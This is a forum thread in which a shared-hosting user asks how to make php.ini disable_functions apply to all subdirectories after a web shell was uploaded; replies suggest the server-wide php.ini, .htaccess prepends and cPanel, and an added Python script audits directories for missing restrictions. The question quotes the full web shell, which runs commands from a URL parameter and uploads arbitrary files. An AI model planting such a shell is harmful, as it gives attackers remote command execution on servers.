A few weeks ago I opened up a hole on my shared server and my friend uploaded the following PHP script:

    <?php
    if(isset($_REQUEST['cmd'])) {
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
    }
    ?>

    <?php
    if(isset($_REQUEST['upload'])) {
        echo '<form enctype="multipart/form-data" action=".config.php?send" method="POST">
            <input type="hidden" name="MAX_FILE_SIZE" value="5120000" />
            Send this file: <input name="userfile" type="file" />
            To here: <input type="text" name="direct" value="/home/chriskan/public_html/_phx2600/wp-content/???" />
            <input type="submit" value="Send File" />
        </form>';
    }
    ?>

    <?php
    if(isset($_REQUEST['send'])) {
        $uploaddir = $_POST["direct"];
        $uploadfile = $uploaddir . basename($_FILES['userfile']['name']);

        if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
            echo "File is valid, and was successfully uploaded.\n";
            echo $uploaddir;
        } else {
            echo "Upload failed";
        }
    }
    ?>

This script allows him to process commands through in-URL variables.

I have disabled system, among other functions, in the php.ini file in my public_html directory. This will prevent the script from running if it's located within my public_html directory, but doesn't stop it if it's in a sub-directory of that. If I copy the php.ini file into a sub-directory it will stop it from running from that directory.

My question is, how do I enable my php.ini file to affect all directories/sub-directories of my server?


One, kick off a "friend" that chooses to run scripts like this.

Then worry about securing your server. Your system has a master php.ini somewhere (often /etc/php.ini, but it can be in several places, check php_info()). That file controls the default settings for your server. Also, you can block local settings files that allow overrides.
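
An audit for the behaviour described in the question, where a php.ini only takes effect for scripts in the directory it sits in: it lists every directory that holds .php files but has no local php.ini disabling the required functions. This is an added example, not code from any poster; the function names, the constructed sample tree and every required function other than system are assumptions.

```python
import os
import tempfile

# Assumed policy: the page names only system(); the other three are illustrative.
REQUIRED = {"system", "exec", "shell_exec", "passthru"}

def disabled_functions(ini_path):
    """Names listed by the last disable_functions line of an ini file."""
    names = set()
    with open(ini_path, encoding="utf-8", errors="replace") as fh:
        for line in fh:
            key, sep, value = line.split(";", 1)[0].partition("=")  # drop ; comments
            if sep and key.strip().lower() == "disable_functions":
                value = value.strip().strip('"')
                names = {n.strip().lower() for n in value.split(",") if n.strip()}
    return names

def uncovered_dirs(docroot, required=REQUIRED):
    """Directories with .php files whose own php.ini does not disable `required`."""
    findings = []
    for dirpath, _dirs, files in os.walk(docroot):
        if not any(f.lower().endswith(".php") for f in files):
            continue
        ini = os.path.join(dirpath, "php.ini")
        have = disabled_functions(ini) if os.path.isfile(ini) else set()
        missing = sorted(set(required) - have)
        if missing:
            findings.append((os.path.relpath(dirpath, docroot), missing))
    return sorted(findings)

def build_sample_tree(root):
    """Constructed layout: full ini at the top, partial one level down, none below."""
    os.makedirs(os.path.join(root, "wp-content", "uploads"))
    inis = {"php.ini": "; local overrides\ndisable_functions = system, exec, shell_exec, passthru\n",
            "wp-content/php.ini": 'disable_functions = "system"\n'}
    scripts = ("index.php", "wp-content/index.php", "wp-content/uploads/.config.php")
    for rel, text in list(inis.items()) + [(s, "<?php // placeholder\n") for s in scripts]:
        with open(os.path.join(root, *rel.split("/")), "w") as fh:
            fh.write(text)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        for directory, missing in uncovered_dirs(root):
            print(f"{directory}: not disabled here -> {', '.join(missing)}")
```

Once a single server-wide php.ini is in force, the same walk is still useful for spotting leftover local php.ini files, which can then be reviewed or removed.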


Wow! Move the php.ini file on a per-directory basis? Didn't know you could do that.

My best guess (someone please correct me if I'm wrong): PHP probably overrides the global php.ini file with a local set of rules on a per-directory basis (much like .htaccess), so basically all you would need to do is to update your php.ini directives to the global php.ini (found here in Ubuntu: etc/php5/apache2/php.ini)

Alternatively, you might want to try to use .htaccess to prepend a php page onto all pages with the following:


Of course, make sure the .htaccess which calls the prepend php sits at the root, else you're stuck with the same issue.



Thanks guys, your answers were great, but the answer was right under my nose the entire time. Via cPanel I was able to edit my server to use a single php.ini file.


Are you sure? I wish I had your ISP. By default some ISPs will provide a local copy of the ini file in public_html to allow overrides. But cPanel usually only provides a reference of the server-wide defaults.

